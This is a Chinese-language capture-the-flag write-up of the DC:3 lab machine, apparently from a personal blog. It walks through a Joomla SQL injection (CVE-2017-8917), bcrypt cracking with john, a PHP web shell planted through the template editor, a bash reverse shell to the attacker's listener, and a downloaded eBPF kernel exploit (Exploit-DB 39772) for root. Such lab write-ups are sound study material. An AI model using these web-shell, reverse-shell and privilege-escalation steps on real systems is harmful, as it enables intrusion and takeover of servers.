終於來到了 DC 系列的第三台,距離農曆春節時間已經不多了,不知道能不能夠完成任務,具之前有位同事短短幾個禮拜內打了幾十台 OSCP 靶機,平均一天打兩到三台,真的覺得實力落差甚大,不過主要困難重重的點在於這個世代有著太多誘惑,廢話不多說,馬上就開始 DC:3 吧。
環境設定
VirtualBox: Kali & DC: 3
Net Config: NAT Network
尋找靶機
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-24 14:31 CST
Nmap scan report for 10.0.2.6
Host is up (0.0072s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
目錄爆破
┌──(mksyi㉿kali)-[~/下載/dirsearch]
└─$ python3 dirsearch.py -u http://10.0.2.6/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,htm,html,sql,zip,tar,rar,7z
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, htm, html, sql, zip, tar, rar, 7z | HTTP method: GET | Threads: 30 | Wordlist size: 220520
Error Log: /home/mksyi/下載/dirsearch/logs/errors-21-01-24_14-40-38.log
Target: http://10.0.2.6/
Output File: /home/mksyi/下載/dirsearch/reports/10.0.2.6/_21-01-24_14-40-38.txt
[14:40:38] Starting:
[14:40:39] 301 - 308B - /templates -> http://10.0.2.6/templates/
[14:40:39] 301 - 304B - /media -> http://10.0.2.6/media/
[14:40:39] 301 - 306B - /modules -> http://10.0.2.6/modules/
[14:40:41] 301 - 302B - /bin -> http://10.0.2.6/bin/
[14:40:42] 301 - 306B - /plugins -> http://10.0.2.6/plugins/
[14:40:42] 301 - 305B - /images -> http://10.0.2.6/images/
[14:40:42] 301 - 307B - /includes -> http://10.0.2.6/includes/
[14:40:43] 301 - 307B - /language -> http://10.0.2.6/language/
[14:40:44] 301 - 309B - /components -> http://10.0.2.6/components/
[14:40:44] 301 - 304B - /cache -> http://10.0.2.6/cache/
[14:40:45] 301 - 308B - /libraries -> http://10.0.2.6/libraries/
[14:40:55] 301 - 302B - /tmp -> http://10.0.2.6/tmp/
[14:40:56] 301 - 306B - /layouts -> http://10.0.2.6/layouts/
[14:41:09] 301 - 312B - /administrator -> http://10.0.2.6/administrator/
[14:42:29] 301 - 302B - /cli -> http://10.0.2.6/cli/
[14:48:17] 403 - 296B - /server-status
解題過程
DC:3 只有一個 80 Port,瀏覽頁面發現是個 Joomla 的 CMS,然後這次的提示表示與以往不同,該題只有一個 Flag 而已,必須取得 root,估計是找 Joomla 的洞直接取得 root,並且在頁面上可以發現有個帳號為 admin。
Get Shell
由於不知道版本號,所以打起來提升一些麻煩程度,但時間是攻擊者的好朋友,經過一番嘗試發現存在 CVE-2017-8917 弱點,可以被 SQL-Injection 攻擊。
找到線上的 Exploit 找到 admin 的帳戶資料與密碼 Hash 值,但這是 Bcrypt 透過暴力破解會耗費大量的時間,效率不佳,就如同 DC-1 的 Drupal 一樣。
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: d8uea_users
- Found table: users
- Extracting users from d8uea_users
[$] Found user ['629', 'admin', 'admin', '[email protected]', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu', '', '']
- Extracting sessions from d8uea_session
- Extracting users from users
- Extracting sessions from session
尋找了 joomla 的相關破密方法,並沒有麼突破,最後還是腳踏實地的爆爆看,這邊使用工具 john。
echo -ne "\$2y\$10\$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu" > admin.hash
john admin.hash --wordlist /usr/share/wordlists/rockyou.tar
結果竟然爆出來了,密碼為 snoopy。
┌──(mksyi㉿kali)-[~]
└─$ john admin.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
snoopy (?)
1g 0:00:00:06 DONE (2021-01-24 15:42) 0.1508g/s 21.26p/s 21.26c/s 21.26C/s snoopy..hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed
由於有預先掃目錄,發現有個可疑路徑 administrator,實際訪問就是 Joomla 的後台。
就由爆破出來的密碼進行登入,並在後台發現 Extensions 底下的 Templates 可以直接編輯 Joomla 檔案。
藉此直接編輯 index.php 上馬。
<?php echo system(@$_GET['a'])?>
之後啟動監聽,並彈個 reverse shell 回來。
nc -nl -p 8080
http://10.0.2.6/templates/protostar/shell.php?a=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.2.15%2F8080%200%3E%261%27
- 這部分折騰很久,因為對於 Joomla 框架不熟,一度以為路徑就是跟目錄底下,結果是在
tmplates底下,試了半天一直在跟目錄底下找不到自己上傳的馬,被 404 打到臉好種。
提權
現在有 Reverse shell 後,便開始找提權方法。
SUID check
www-data@DC-3:/var/www$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/ping6
/bin/ntfs-3g
/bin/umount
/bin/su
/bin/fusermount
/bin/mount
/bin/ping
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newuidmap
/usr/bin/newgrp
lsb_release
www-data@DC-3:/var/www$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
uname
www-data@DC-3:/var/www$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
CVE-2016-4557
這邊大概掌握到的只有系統版本與核心版本,以 4.4.0-21-generic 為關鍵字搜尋到前幾個 exploit 幾乎沒作用,最後是直接在 Exploit-DB 上找到 39772,從內文的 Source 資訊得到這是 CVE-2016-4557 弱點,並且嘗試用。
www-data@DC-3:/tmp$ cd /tmp
www-data@DC-3:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
<-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2021-01-25 04:35:10-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 13.114.40.48
Connecting to github.com (github.com)|13.114.40.48|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2021-01-25 04:35:11-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.228.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.228.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'
0K ...... 100% 172K=0.04s
2021-01-25 04:35:12 (172 KB/s) - '39772.zip' saved [7025/7025]
www-data@DC-3:/tmp$ unzip 39772
unzip 39772
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
www-data@DC-3:/tmp$ cd 39772
www-data@DC-3:/tmp$ ls
crasher.tar
exploit.tar
www-data@DC-3:/tmp/39772$ tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
whoami
root
摸索了一陣子,終於取得了 Root,可以在 /root 底下找到 the-flag.txt。
cat /root/the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
